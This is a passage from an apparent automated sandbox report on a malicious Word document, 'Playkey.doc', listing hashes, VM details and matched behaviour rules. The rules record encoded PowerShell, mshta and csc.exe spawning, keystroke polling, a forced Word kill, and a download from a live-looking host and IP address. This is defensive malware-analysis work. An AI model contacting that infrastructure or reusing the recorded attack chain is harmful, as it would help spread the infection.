monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_2038", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:23.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_2039", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:23.784", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "Playkey.doc", "id": 19989, "md5_hash": "9587a58c5d456ca4fb8d8abba0945861", "sample_type": "word_document", "sha1_hash": "18bb1da68d2073efb52ce3792311b15e958d85a5", "sha256_hash": "7a641c8fa1b7a428bfb66d235064407ab56d119411fbaca6268c8e69696e6729", "size": 1011599, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 59071, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_38930.png", "size": 170024, "thumbnail_archive_path": "screenshots/thumbnail_38930.png", "timestamp": "00:00:38.930", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_65059.png", "size": 168680, "thumbnail_archive_path": "screenshots/thumbnail_65059.png", "timestamp": "00:01:05.059", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_75192.png", "size": 142839, "thumbnail_archive_path": "screenshots/thumbnail_75192.png", "timestamp": "00:01:15.192", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_76314.png", "size": 207882, "thumbnail_archive_path": "screenshots/thumbnail_76314.png", "timestamp": "00:01:16.314", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_78327.png", "size": 144150, "thumbnail_archive_path": "screenshots/thumbnail_78327.png", "timestamp": "00:01:18.327", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_80407.png", "size": 143235, "thumbnail_archive_path": "screenshots/thumbnail_80407.png", "timestamp": "00:01:20.407", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_85468.png", "size": 949344, "thumbnail_archive_path": "screenshots/thumbnail_85468.png", "timestamp": "00:01:25.468", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-10-17 16:08", "analyzer_version": "2.2.0", "chrome_version": "59.0.3071.115", "firefox_version": "25.0", "flash_version": "10.3.183.90", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.710", "microsoft_excel_version": "16.0.4266.1003", "microsoft_office_version": "16.0.4266.1003", "microsoft_power_point_version": "16.0.4266.1003", "microsoft_project_version": "16.0.4266.1003", "microsoft_publisher_version": "16.0.4266.1003", "microsoft_visio_version": "16.0.4266.1003", "microsoft_word_version": "16.0.4266.1003", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_102", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "185.211.244.133", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_139", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"www.samyrai777m.p-host.in\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_184", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_195", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\mshta.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_433", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Local\\!PrivacIE!SharedMemory!Mutex\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1416", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_device", "category_desc": "Device", "operation": "_hook_keyboard", "operation_desc": "Monitor keyboard input", "ref_gfncalls": [ { "ref_id": "gfn_1907", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hook_key_by_keystate_api", "technique_desc": "Frequently read the state of a keyboard key by API.", "technique_path": "built_in._device._hook_keyboard.vmray_hook_key_by_keystate_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_4325", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\system32\\taskkill.exe\" /f /im winword.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_execute_encoded_powershell_script", "operation_desc": "Execute encoded PowerShell script", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_encoded_powershell_script", "technique_desc": "Execute encoded PowerShell script to possibly hide malicious payload.", "technique_path": "built_in._process._execute_encoded_powershell_script.vmray_execute_encoded_powershell_script", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_142", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"185.211.244.133:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"www.samyrai777m.p-host.in/t/tp.php?thread=0\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 96 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }